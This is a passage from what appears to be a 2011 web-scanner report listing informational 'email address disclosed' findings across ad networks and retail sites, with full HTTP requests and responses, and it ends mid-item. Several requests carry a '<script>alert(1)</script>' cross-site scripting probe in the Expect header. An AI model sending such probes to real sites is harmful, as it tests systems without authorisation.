Cookie: Apache="168362049x0.049+1303083450x544669068"; cv="1%3Aq1ZyLi0uyc91zUtWslIyyU9OqknPLc9PsUitqDFNLbEyLLRITSm1MrayMC%2FPL1WqBQA%3D"; rb=0:684339:20838240:4dab7d35-b1d2-915a-d3c0-9d57f9c66b07:0:711384:20861280:c1e1301e-3a1f-4ca7-9870-f636b5f10e66:0:742697:20828160:2931142961646634775:0:806205:20882880:0c2aede6-6bb6-11e0-8fe6-0025900a8ffe:0; geo="1%3ADchBDoIwEIXhu8xaTTspmLJVT4AeYDpDCYlYA2gihLv7Ni%2Ff%2Bzf6emo2Woc3NcTOOX%2FEsqMDLSvSrb2DVkZ4Lnl5yq%2BbToqPOgpq5T2s5QM%2FWnDqX%2BD1As5DD2ZnMZ1TSJVFjsqqIkFqs6xdzSHQvv8B"; b="%3A%3A6e73"; fq="84fok%2C1uo0%7Clkigxp"; srh="1%3Aq64FAA%3D%3D"; rb2=CjQKBjY4NDMzORjljcu5CyIkNGRhYjdkMzUtYjFkMi05MTVhLWQzYzAtOWQ1N2Y5YzY2YjA3CjQKBjcxMTM4NBiI_srNEyIkYzFlMTMwMWUtM2ExZi00Y2E3LTk4NzAtZjYzNmI1ZjEwZTY2CjQKBjgwNjIwNRjAyYaZFSIkMGMyYWVkZTYtNmJiNi0xMWUwLThmZTYtMDAyNTkwMGE4ZmZlEAE; ut="1%3AHc3LDoMgEIXhd5k1CwZaanwbUCqmFMulEnR895Juv%2F8k54RdwHjCy7a6pTnDCJNzwxK53gmjX8qbBBkWozxqh0Em3wHvLIuckPDTniGQJsRysOyt931lSt3oQcpINjmv1qZuofPMv70SBwZGh2DT%2Bj%2BE6%2FoB"

Response

HTTP/1.1 200 OK
Cache-Control: no-cache, no-store, must-revalidate
Expires: Mon, 26 Jul 1997 05:00:00 GMT
P3P: policyref="http://files.adbrite.com/w3c/p3p.xml",CP="NOI PSA PSD OUR IND UNI NAV DEM STA OTC"
Content-Type: application/x-javascript
Set-Cookie: b="%3A%3A12ggb%2C6e73"; path=/; domain=.adbrite.com; expires=Tue, 01-May-2012 02:19:49 GMT
Set-Cookie: ut="1%3AHY1LDoMgFADv8tYseNBS421AqZhSLJ9K0OfdS7qdmWRO2AWMJ7xsq1uaM4wwOTcskeudMPqlvEmQYVnkhISf9gyBNCGWg8Uoj9qjQSbfI7yz7K33nZhSN3qQMpJNzqu1qVvoeObfbokDA6NDsGn9D%2BG6fg%3D%3D"; path=/; domain=.adbrite.com; expires=Thu, 29-Apr-2021 02:19:49 GMT
Set-Cookie: vsd=0@1@4dbe14c5@websiteprice.net; path=/; domain=.adbrite.com; expires=Wed, 04-May-2011 02:19:49 GMT
Set-Cookie: fq="84fok%2C1uo0%7Clkigxp%2C83ol2%2C1uo0%7Clkjqh1%2C826ke%2C1uo0%7Clkjqh1"; path=/; domain=.adbrite.com; expires=Tue, 01-May-2012 02:19:49 GMT
Connection: close
Server: XPEHb/1.0
Accept-Ranges: none
Date: Mon, 02 May 2011 02:19:49 GMT
Content-Length: 4307

document.write('<a class=\"adHeadline\" target=\"_top\" onmouseover=\"window.status=\'http://www.cheapezfast.com\'; return true;\" onmouseout=\"window.status=\' \'; return true;\" href=\"http://click.
...[SNIP]...

27.5. http://ads2.adbrite.com/v0/ad

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ads2.adbrite.com
Path:   /v0/ad

Issue detail

The following email address was disclosed in the response:

Request

GET /v0/ad?sid=1794248&zs=3330305f323530&ifr=1&ref=http%3A%2F%2Fwebsiteprice.net%2Fresult%2F%3Fid%3D65934&zx=430&zy=1263&ww=1041&wh=903&fl=1 HTTP/1.1
Host: ads2.adbrite.com
Proxy-Connection: keep-alive
Referer: http://websiteprice.net/result/?id=65934
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: Apache="168362049x0.049+1303083450x544669068"; cv="1%3Aq1ZyLi0uyc91zUtWslIyyU9OqknPLc9PsUitqDFNLbEyLLRITSm1MrayMC%2FPL1WqBQA%3D"; geo="1%3ADchBDoIwEIXhu8xaTTspmLJVT4AeYDpDCYlYA2gihLv7Ni%2Ff%2Bzf6emo2Woc3NcTOOX%2FEsqMDLSvSrb2DVkZ4Lnl5yq%2BbToqPOgpq5T2s5QM%2FWnDqX%2BD1As5DD2ZnMZ1TSJVFjsqqIkFqs6xdzSHQvv8B"; srh="1%3Aq64FAA%3D%3D"; b="%3A%3A12ggb%2C6e73"; fq="7l04r%2C1uo0%7Clkjpsr%2C84fok%2C1uo0%7Clkigxp%2C83ol2%2C1uo0%7Clkjpss%2C826ke%2C1uo0%7Clkjpsr"; rb2=CjQKBjY4NDMzORjljcu5CyIkNGRhYjdkMzUtYjFkMi05MTVhLWQzYzAtOWQ1N2Y5YzY2YjA3CjQKBjcxMTM4NBiI_srNEyIkYzFlMTMwMWUtM2ExZi00Y2E3LTk4NzAtZjYzNmI1ZjEwZTY2CjAKBjc2MjcwMRiN1OvNEyIgOTc4OTcyREZBMDYzMDAwRDJDMEU3QTM4MEJGQTFERUMKNAoGODA2MjA1GMDJhpkVIiQwYzJhZWRlNi02YmI2LTExZTAtOGZlNi0wMDI1OTAwYThmZmUQAQ; ut="1%3AHc7LDoMgEIXhd5k1CwarJb4NqBXTKRTwEnV892K3f76TnBNWBe0J72HfQuoztNA5p8cozcoYaZw%2FrNiKrHJCxu%2F%2B8p4NI86HiLE6toJ0laggrEU2qjf3zOnMyJJxCVJkGohKtfMW%2BMmNrUTnqJn25uFL7uVCNwYB1ng%2FpOl%2FA67rBw%3D%3D"; vsd=0@3@4dbe115e@websiteprice.net; rb=0:684339:20838240:4dab7d35-b1d2-915a-d3c0-9d57f9c66b07:0:711384:20861280:c1e1301e-3a1f-4ca7-9870-f636b5f10e66:0:742697:20828160:2931142961646634775:0:762701:20861280:978972DFA063000D2C0E7A380BFA1DEC:0:806205:20882880:0c2aede6-6bb6-11e0-8fe6-0025900a8ffe:0

Response

HTTP/1.1 200 OK
Cache-Control: no-cache, no-store, must-revalidate
Expires: Mon, 26 Jul 1997 05:00:00 GMT
P3P: policyref="http://files.adbrite.com/w3c/p3p.xml",CP="NOI PSA PSD OUR IND UNI NAV DEM STA OTC"
Content-Type: application/x-javascript
Set-Cookie: b="%3A%3A12gg8%2C12ggb%2C6e73"; path=/; domain=.adbrite.com; expires=Tue, 01-May-2012 02:22:25 GMT
Set-Cookie: rb2=CjQKBjY4NDMzORjljcu5CyIkNGRhYjdkMzUtYjFkMi05MTVhLWQzYzAtOWQ1N2Y5YzY2YjA3CjQKBjcxMTM4NBiI_srNEyIkYzFlMTMwMWUtM2ExZi00Y2E3LTk4NzAtZjYzNmI1ZjEwZTY2CjYKBjc2MjcwMRCd87L6CRi9rqrOEyIgOTc4OTcyREZBMDYzMDAwRDJDMEU3QTM4MEJGQTFERUMKFAoGNzgyNjA2EL3WyKMKGL2uqs4TCjQKBjgwNjIwNRjAyYaZFSIkMGMyYWVkZTYtNmJiNi0xMWUwLThmZTYtMDAyNTkwMGE4ZmZlEAE; path=/; domain=.adbrite.com; expires=Sun, 31-Jul-2011 02:22:25 GMT
Set-Cookie: ut="1%3AHY5LEoMgEAXvMmsWDEZDeRtQI1YmEMBPqePdg9l29et6J6wK2hPew76F1GdooXNOj1GalTHSOH9YsRXZqN7cwOnMyJJxCVLEWB1bobpKVDSsRVY5IeN3f3nPZYDzITINRMWy8xb4yY2tROeomfbm4Qvu5UJ3EgRY4%2F2Qpv8NuK4f"; path=/; domain=.adbrite.com; expires=Thu, 29-Apr-2021 02:22:25 GMT
Set-Cookie: vsd=0@4@4dbe1561@websiteprice.net; path=/; domain=.adbrite.com; expires=Wed, 04-May-2011 02:22:25 GMT
Set-Cookie: fq="7l04r%2C1uo0%7Clkjpsr%2C84fok%2C1uo0%7Clkigxp%2C83ol2%2C1uo0%7Clkjpss%2C84y2m%2C1uo0%7Clkjqld%2C826ke%2C1uo0%7Clkjpsr"; path=/; domain=.adbrite.com; expires=Tue, 01-May-2012 02:22:25 GMT
Set-Cookie: rb=0:684339:20838240:4dab7d35-b1d2-915a-d3c0-9d57f9c66b07:0:711384:20861280:c1e1301e-3a1f-4ca7-9870-f636b5f10e66:0:742697:20828160:2931142961646634775:0:762701:20861280:978972DFA063000D2C0E7A380BFA1DEC:0:782606:20861280::0:806205:20882880:0c2aede6-6bb6-11e0-8fe6-0025900a8ffe:0; path=/; domain=.adbrite.com; expires=Sun, 31-Jul-2011 02:22:25 GMT
Connection: close
Server: XPEHb/1.0
Accept-Ranges: none
Date: Mon, 02 May 2011 02:22:25 GMT
Content-Length: 3164

var AdBrite_Title_Color_Default = '0000FF';
var AdBrite_Text_Color_Default = '000000';
var AdBrite_Background_Color_Default = 'fcfaf3';
var AdBrite_Border_Color_Default = 'fcfaf3';
var AdBrite_URL_Col
...[SNIP]...

27.6. http://cdn.js-kit.com/scripts/comments.js

Summary

Severity:   Information
Confidence:   Certain
Host:   http://cdn.js-kit.com
Path:   /scripts/comments.js

Issue detail

The following email address was disclosed in the response:

Request

GET /scripts/comments.js HTTP/1.1
Host: cdn.js-kit.com
Proxy-Connection: keep-alive
Referer: http://insurancenewsnet.com/article.aspx?id=257992
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Server: Apache
Accept-Ranges: bytes
Vary: Accept-Encoding
Cache-Control: max-age=259200
Content-Type: application/javascript
Age: 59475
Date: Sun, 01 May 2011 23:33:49 GMT
Last-Modified: Sun, 01 May 2011 06:58:19 GMT
Expires: Wed, 04 May 2011 07:13:56 GMT
Connection: keep-alive
Content-Length: 474074


...[SNIP]...
<support@js-kit.com>
...[SNIP]...

27.7. http://insurancenewsnet.com/styles/maintest.css

Summary

Severity:   Information
Confidence:   Certain
Host:   http://insurancenewsnet.com
Path:   /styles/maintest.css

Issue detail

The following email address was disclosed in the response:

Request

GET /styles/maintest.css HTTP/1.1
Host: insurancenewsnet.com
Proxy-Connection: keep-alive
Referer: http://insurancenewsnet.com/article.aspx?id=257992
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: text/css,*/*;q=0.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ASP.NET_SessionId=pddqwnm3cm5gjqvccrmz1345; INNid=pddqwnm3cm5gjqvccrmz1345

Response

HTTP/1.1 200 OK
Content-Type: text/css
Last-Modified: Thu, 12 Aug 2010 17:08:14 GMT
Accept-Ranges: bytes
ETag: "0939f3403acb1:0"
Vary: Accept-Encoding
Server: Microsoft-IIS/7.0
X-Powered-By: UrlRewriter.NET 2.0.0
X-Powered-By: ASP.NET
Date: Sun, 01 May 2011 23:33:12 GMT
Content-Length: 1755

/*
Created by Keith Donegan of Code-Sucks.com
   
    E-Mail: Keithdonegan@gmail.com
   
    You can do whatever you want with these layouts,
    but it would be greatly appreciated if you gave a link
    back to http://www.code-sucks.com
   
*/

/* * { padding: 0; margin: 0; }*/
...[SNIP]...

27.8. http://www.agingass.com/favicon.ico

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.agingass.com
Path:   /favicon.ico

Issue detail

The following email address was disclosed in the response:

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.agingass.com
Accept: */*
Proxy-Connection: Keep-Alive
Expect: <script>alert(1)</script>

Response

HTTP/1.1 404 Not Found
Server: nginx/0.6.34
Date: Sun, 01 May 2011 23:51:09 GMT
Content-Type: text/html; charset=iso-8859-1
Connection: keep-alive
Vary: accept-language,accept-charset
Accept-Ranges: bytes
Content-Language: en
Expires: Sun, 01 May 2011 23:51:09 GMT
Content-Length: 1021

<?xml version="1.0" encoding="ISO-8859-1"?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" l
...[SNIP]...
<link rev="made" href="mailto:root@ndu031.xpower.net" />
...[SNIP]...
<a href="mailto:root@ndu031.xpower.net">
...[SNIP]...

27.9. http://www.corp.att.com/attsearch/sayt/search-as-you-type.js

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.corp.att.com
Path:   /attsearch/sayt/search-as-you-type.js

Issue detail

The following email address was disclosed in the response:

Request

GET /attsearch/sayt/search-as-you-type.js HTTP/1.1
Host: www.corp.att.com
Proxy-Connection: keep-alive
Referer: http://www.business.att.com/enterprise/Family/network-security/threat-vulnerability-management/?GUID=F7BA3C75-6B83-4966-96A6-0F35574C4352&WT.srch=1
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: cust_type=new; svariants=NA; ECOM_GTM=owaln_osaln; bn_u=6923522882713032529; op704wirelesssearchlandingpage1gum=a005005004274ri19c6a28261; DTAB=Tab=Bus; colam_ctn=l%3Den_US; browserid=A001533839947; fsr.a=1304310800620; foresee.analytics=%7B%22rr_domain%22%3A%22att.com%22%2C%22rr_version%22%3A12.1%2C%22rr_group_id%22%3A%221304310803325_7694%22%7D

Response

HTTP/1.1 200 OK
Date: Sun, 01 May 2011 23:33:30 GMT
Server: Sun-ONE-Web-Server/6.1
Content-Length: 64961
Content-Type: application/x-javascript
P3p: policyref="http://www.corp.att.com/w3c/p3p.xml",CP="CAO DSP COR LAW CURa ADMa DEVa TAIa PSAa PSDa IVAo IVDo CONo TELo OUR OTRi IND PHY ONL UNI PUR COM NAV INT DEM CNT STA PRE GOV"
Cache-Control: max-age=180, proxy-revalidate
ETag: "5658d9a1-1-fdc1-4db19e7c"
Last-Modified: Fri, 22 Apr 2011 15:27:56 GMT
Accept-Ranges: bytes
X-Cache: HIT from 12.120.79.28
Via: 1.1 12.120.79.28:80 (cache/2.6.2.3.13.ATT)
Connection: keep-alive

/*
* Copyright (C) 2006 Google Inc.
* Additional functionality by Joe D'Andrea, Liquid Joe LLC <joe@liquidjoe.biz>
* Version: 1.0-att
* Updated: 22 October 2009
*
* Licensed under the Apac
...[SNIP]...

27.10. http://www.cosmeticscop.com/favicon.ico

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.cosmeticscop.com
Path:   /favicon.ico

Issue detail

The following email address was disclosed in the response:

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.cosmeticscop.com
Accept: */*
Proxy-Connection: Keep-Alive
Expect: <script>alert(1)</script>

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
Set-Cookie: ecm=user_id=0&isMembershipUser=0&site_id=&username=&new_site=/&unique_id=0&site_preview=0&langvalue=0&DefaultLanguage=1033&NavLanguage=1033&LastValidLanguageID=1033&DefaultCurrency=840&SiteCurrency=840&ContType=&UserCulture=1033&dm=www.cosmeticscop.com&SiteLanguage=1033; path=/
Set-Cookie: EktGUID=86192b3f-96a1-4c58-aae6-ace34af4c08a; expires=Tue, 01-May-2012 23:47:45 GMT; path=/
Set-Cookie: EkAnalytics=newuser; expires=Tue, 01-May-2012 23:47:45 GMT; path=/
Set-Cookie: ASP.NET_SessionId=ak5g2p55u4jtmvbge5by5sfw; path=/; HttpOnly
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Date: Sun, 01 May 2011 23:47:45 GMT
Content-Length: 1295


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<link rel=
...[SNIP]...
<a href="mailto:custserv@paulaschoice.com">custserv@paulaschoice.com</a>
...[SNIP]...

27.11. http://www.crankyape.com/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.crankyape.com
Path:   /

Issue detail

The following email address was disclosed in the response:

Request

GET / HTTP/1.1
Host: www.crankyape.com
Proxy-Connection: keep-alive
Referer: http://www.crankyape.com/favicon.ico
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utma=29347566.1415346539.1304319195.1304319195.1304319195.1; __utmb=29347566; __utmc=29347566; __utmz=29347566.1304319195.1.1.utmccn=(referral)|utmcsr=burp|utmcct=/show/5|utmcmd=referral

Response

HTTP/1.1 200 OK
Cache-Control: no-cache
Date: Mon, 02 May 2011 01:53:20 GMT
Content-Type: text/html
Expires: Sun, 01 May 2011 01:53:20 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Set-Cookie: ASPSESSIONIDSARCDQAB=MKADMMGCLDEMBHOGIDLDIPPF; path=/
Vary: Accept-Encoding
Content-Length: 19683

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">


<html>
<head>
<title>Crankyape.com Bank repo rvs, motorcycles, snowmobiles, atvs, boats, trucks, trailers, go karts,
...[SNIP]...
<meta name="author" content="webmaster@crankyape.com">
...[SNIP]...

27.12. http://www.crankyape.com/favicon.ico

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.crankyape.com
Path:   /favicon.ico

Issue detail

The following email address was disclosed in the response:

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.crankyape.com
Accept: */*
Proxy-Connection: Keep-Alive
Expect: <script>alert(1)</script>

Response

HTTP/1.1 999 No Hacking
Server: WebKnight/2.1
Date: Sun, 01 May 2011 23:41:46 GMT
Content-Type: text/html; charset=windows-1252
Content-Length: 2420
Pragma: no-cache
Cache-control: no-cache
Expires: Sun, 01 May 2011 23:41:46 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Conten
...[SNIP]...
<meta name="author" content="webmaster@mrcauction.com" />
...[SNIP]...

27.13. http://www.crankyape.com/javascripts/prototype.js

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.crankyape.com
Path:   /javascripts/prototype.js

Issue detail

The following email address was disclosed in the response:

Request

GET /javascripts/prototype.js HTTP/1.1
Host: www.crankyape.com
Proxy-Connection: keep-alive
Referer: http://www.crankyape.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utma=29347566.1415346539.1304319195.1304319195.1304319195.1; __utmb=29347566; __utmc=29347566; __utmz=29347566.1304319195.1.1.utmccn=(referral)|utmcsr=burp|utmcct=/show/5|utmcmd=referral; ASPSESSIONIDSARCDQAB=LKADMMGCJFEGEIFCGJNABOCD

Response

HTTP/1.1 200 OK
Date: Mon, 02 May 2011 01:53:21 GMT
Content-Length: 68567
Content-Type: application/x-javascript
Last-Modified: Tue, 19 Dec 2006 04:38:00 GMT
Accept-Ranges: bytes
ETag: "0445f762723c71:6f8c"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET

/* Prototype JavaScript framework, version 1.5.0_rc2
* (c) 2005, 2006 Sam Stephenson <sam@conio.net>
*
* Prototype is freely distributable under the terms of an MIT-style license.
* For detail
...[SNIP]...

27.14. http://www.crankyape.com/javascripts/validation.js

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.crankyape.com
Path:   /javascripts/validation.js

Issue detail

The following email address was disclosed in the response:

Request

GET /javascripts/validation.js HTTP/1.1
Host: www.crankyape.com
Proxy-Connection: keep-alive
Referer: http://www.crankyape.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utma=29347566.1415346539.1304319195.1304319195.1304319195.1; __utmb=29347566; __utmc=29347566; __utmz=29347566.1304319195.1.1.utmccn=(referral)|utmcsr=burp|utmcct=/show/5|utmcmd=referral; ASPSESSIONIDSARCDQAB=LKADMMGCJFEGEIFCGJNABOCD

Response

HTTP/1.1 200 OK
Date: Mon, 02 May 2011 01:53:21 GMT
Content-Length: 10728
Content-Type: application/x-javascript
Last-Modified: Sat, 06 Jan 2007 23:44:00 GMT
Accept-Ranges: bytes
ETag: "020f689ec31c71:6f8c"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET

/*
* Really easy field validation with Prototype
* http://tetlaw.id.au/view/javascript/really-easy-field-validation
* Andrew Tetlaw
* Version 1.5.4.1 (2007-01-05)
*
* Copyright (c) 2007 Andrew
...[SNIP]...
a valid date.', function(v) {
               var test = new Date(v);
               return Validation.get('IsEmpty').test(v) || !isNaN(test);
           }],
   ['validate-email', 'Please enter a valid email address. For example fred@domain.com .', function (v) {
               return Validation.get('IsEmpty').test(v) || /\w{1,}[@][\w\-]{1,}([.]([\w\-]{1,})){1,3}$/.test(v)
           }],
   ['validate-url', 'Please enter a valid URL.', function (v) {
               ret
...[SNIP]...

27.15. https://www.crankyape.com/default.asp

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.crankyape.com
Path:   /default.asp

Issue detail

The following email address was disclosed in the response:

Request

GET /default.asp?pg=DispSingleItem&ItemNumber=26361 HTTP/1.1
Host: www.crankyape.com
Connection: keep-alive
Referer: http://www.crankyape.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utma=29347566.1415346539.1304319195.1304319195.1304319195.1; __utmb=29347566; __utmc=29347566; __utmz=29347566.1304319195.1.1.utmccn=(referral)|utmcsr=burp|utmcct=/show/5|utmcmd=referral; ASPSESSIONIDSARCDQAB=LKADMMGCJFEGEIFCGJNABOCD

Response

HTTP/1.1 200 OK
Cache-Control: no-cache
Date: Mon, 02 May 2011 01:53:37 GMT
Content-Type: text/html
Expires: Sun, 01 May 2011 01:53:36 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Vary: Accept-Encoding
Content-Length: 30879

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">


<html>
<head>
<title>Crankyape.com Insurance total loss rvs, motorcycles, atvs, snowmobiles, boats, trucks, trailers.
...[SNIP]...
<meta name="author" content="webmaster@crankyape.com">
...[SNIP]...

27.16. https://www.crankyape.com/javascripts/prototype.js

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.crankyape.com
Path:   /javascripts/prototype.js

Issue detail

The following email address was disclosed in the response:

Request

GET /javascripts/prototype.js HTTP/1.1
Host: www.crankyape.com
Connection: keep-alive
Referer: https://www.crankyape.com/default.asp?pg=DispSingleItem&ItemNumber=26361
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utma=29347566.1415346539.1304319195.1304319195.1304319195.1; __utmb=29347566; __utmc=29347566; __utmz=29347566.1304319195.1.1.utmccn=(referral)|utmcsr=burp|utmcct=/show/5|utmcmd=referral; ASPSESSIONIDSARCDQAB=LKADMMGCJFEGEIFCGJNABOCD

Response

HTTP/1.1 200 OK
Date: Mon, 02 May 2011 01:53:40 GMT
Content-Length: 68567
Content-Type: application/x-javascript
Last-Modified: Tue, 19 Dec 2006 04:38:00 GMT
Accept-Ranges: bytes
ETag: "0445f762723c71:6f8c"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET

/* Prototype JavaScript framework, version 1.5.0_rc2
* (c) 2005, 2006 Sam Stephenson <sam@conio.net>
*
* Prototype is freely distributable under the terms of an MIT-style license.
* For detail
...[SNIP]...

27.17. https://www.crankyape.com/javascripts/validation.js

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.crankyape.com
Path:   /javascripts/validation.js

Issue detail

The following email address was disclosed in the response:

Request

GET /javascripts/validation.js HTTP/1.1
Host: www.crankyape.com
Connection: keep-alive
Referer: https://www.crankyape.com/default.asp?pg=DispSingleItem&ItemNumber=26361
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utma=29347566.1415346539.1304319195.1304319195.1304319195.1; __utmb=29347566; __utmc=29347566; __utmz=29347566.1304319195.1.1.utmccn=(referral)|utmcsr=burp|utmcct=/show/5|utmcmd=referral; ASPSESSIONIDSARCDQAB=LKADMMGCJFEGEIFCGJNABOCD

Response

HTTP/1.1 200 OK
Date: Mon, 02 May 2011 01:53:40 GMT
Content-Length: 10728
Content-Type: application/x-javascript
Last-Modified: Sat, 06 Jan 2007 23:44:00 GMT
Accept-Ranges: bytes
ETag: "020f689ec31c71:6f8c"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET

/*
* Really easy field validation with Prototype
* http://tetlaw.id.au/view/javascript/really-easy-field-validation
* Andrew Tetlaw
* Version 1.5.4.1 (2007-01-05)
*
* Copyright (c) 2007 Andrew
...[SNIP]...
a valid date.', function(v) {
               var test = new Date(v);
               return Validation.get('IsEmpty').test(v) || !isNaN(test);
           }],
   ['validate-email', 'Please enter a valid email address. For example fred@domain.com .', function (v) {
               return Validation.get('IsEmpty').test(v) || /\w{1,}[@][\w\-]{1,}([.]([\w\-]{1,})){1,3}$/.test(v)
           }],
   ['validate-url', 'Please enter a valid URL.', function (v) {
               ret
...[SNIP]...

27.18. http://www.ec51.com/favicon.ico

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.ec51.com
Path:   /favicon.ico

Issue detail

The following email address was disclosed in the response:

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.ec51.com
Accept: */*
Proxy-Connection: Keep-Alive
Expect: <script>alert(1)</script>

Response

HTTP/1.0 417 Expectation Failed
Server: squid/3.1.11
Mime-Version: 1.0
Date: Sun, 01 May 2011 18:42:03 GMT
Content-Type: text/html
Content-Length: 3730
X-Squid-Error: ERR_INVALID_REQ 0
Vary: Accept-Language
Content-Language: en
X-Cache: MISS from 127.0.0.1
X-Cache-Lookup: NONE from 127.0.0.1:80
Via: 1.0 127.0.0.1 (squid/3.1.11)
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<html><head>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8">
<title>ERROR: The requested
...[SNIP]...
<a href="mailto:337805@qq.com?subject=CacheErrorInfo%20-%20ERR_INVALID_REQ&amp;body=CacheHost%3A%20127.0.0.1%0D%0AErrPage%3A%20ERR_INVALID_REQ%0D%0AErr%3A%20%5Bnone%5D%0D%0ATimeStamp%3A%20Sun,%2001%20May%202011%2018%3A42%3A03%20GM
...[SNIP]...
.21.0%20OpenSSL%2F0.9.8o%20zlib%2F1.2.3%0D%0AHost%3A%20www.ec51.com%0D%0AAccept%3A%20*%2F*%0D%0AProxy-Connection%3A%20Keep-Alive%0D%0AExpect%3A%20%3Cscript%3Ealert(1)%3C%2Fscript%3E%0D%0A%0D%0A%0D%0A">337805@qq.com</a>
...[SNIP]...

27.19. http://www.girlfriendsecret.com/favicon.ico

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.girlfriendsecret.com
Path:   /favicon.ico

Issue detail

The following email address was disclosed in the response:

Request

